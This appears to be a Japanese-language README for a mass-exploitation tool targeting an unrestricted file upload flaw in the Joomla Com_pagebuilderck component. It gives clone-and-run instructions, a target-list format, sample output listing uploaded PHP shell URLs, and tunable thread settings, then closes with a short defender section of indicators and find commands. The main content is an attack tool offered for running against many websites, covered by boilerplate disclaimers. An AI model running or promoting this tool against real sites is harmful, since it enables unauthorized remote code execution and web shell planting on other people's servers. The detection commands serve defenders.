
CVE-2026-56290 - Joomla Com_pagebuilderckコンポーネント向けマスエクスプロイト(無制限ファイルアップロード→RCE)。マルチスレッド対応、自動CSRFバイパス、PHPシェルアップローダー。
このツールは、教育目的および正規のセキュリティテスト目的のみで使用してください。
- コンピュータシステムへの不正アクセスは違法です
- このツールは、自分が所有するシステム、または明示的なテスト許可を得たシステムでのみ使用してください
- 作者は、このツールの誤用または損害について一切の責任を負いません
- このツールを使用することで、適用されるすべての法律および規制を遵守することに同意したものとみなされます
詳細な免責事項は Jenderal92 のカバーに記載されています。こちら !!! で確認できます。
CVE-2026-56290 は、Com_pagebuilderck Joomla コンポーネントを標的とした大量エクスプロイトツールです。この脆弱性により、リモート攻撃者は制限のないファイルアップロード機構を介して任意の PHP ファイルをアップロードでき、リモートコード実行 (RCE) につながります。
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-56290 |
| コンポーネント | Com_pagebuilderck |
| プラットフォーム | Joomla! CMS |
| タイプ | 無制限ファイルアップロード (RCE) |
| CVSS スコア | 9.8 (緊急) |
/media/com_pagebuilderck/gfonts/ にアップロードしますreslt.txt に保存しますPython 2.7
pip (Python package installer)
Python 依存関係
pip install requests colorama
🔧 インストール
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 使用方法
基本的な使用方法
python CVE-2026-56290.py targets.txt
入力ファイルの形式
targets.txt ファイルを、各行に 1 つの URL を記載して作成します:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored
出力
· コンソール出力: リアルタイムの進行状況と結果 · reslt.txt: すべての脆弱なシェル URL が含まれます
実行例
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt
[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...
[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ 設定
スクリプト内で次の変数を変更できます:
THREADS = 15 # Number of concurrent workers
TIMEOUT = 10 # Request timeout in seconds
USER_AGENT = "..." # Custom User-Agent string
OUTPUT_FILE = "reslt.txt" # Output filename
🛡️ セキュリティ上の考慮事項
システム管理者向け
Com_pagebuilderck を使用した Joomla サイトを運用している場合:
/media/com_pagebuilderck/gfonts/ に不審なファイルがないか監視する侵害の痕跡 (IoC)
次のような悪用の兆候を探してください:
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
検出コマンド
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ 法的通知
このソフトウェアは、いかなる保証もなく「現状のまま」提供されます。作者は、このツールの違法または非倫理的な使用について一切の責任を負いません。システムをテストする前に、必ず適切な許可を取得してください。
🙏 謝辞
· CVE-2026-56290 を発見および報告したセキュリティ研究者 · CMS を維持している Joomla コミュニティ
覚えておいてください: 大きな力には大きな責任が伴います。このツールを倫理的かつ合法的に使用してください。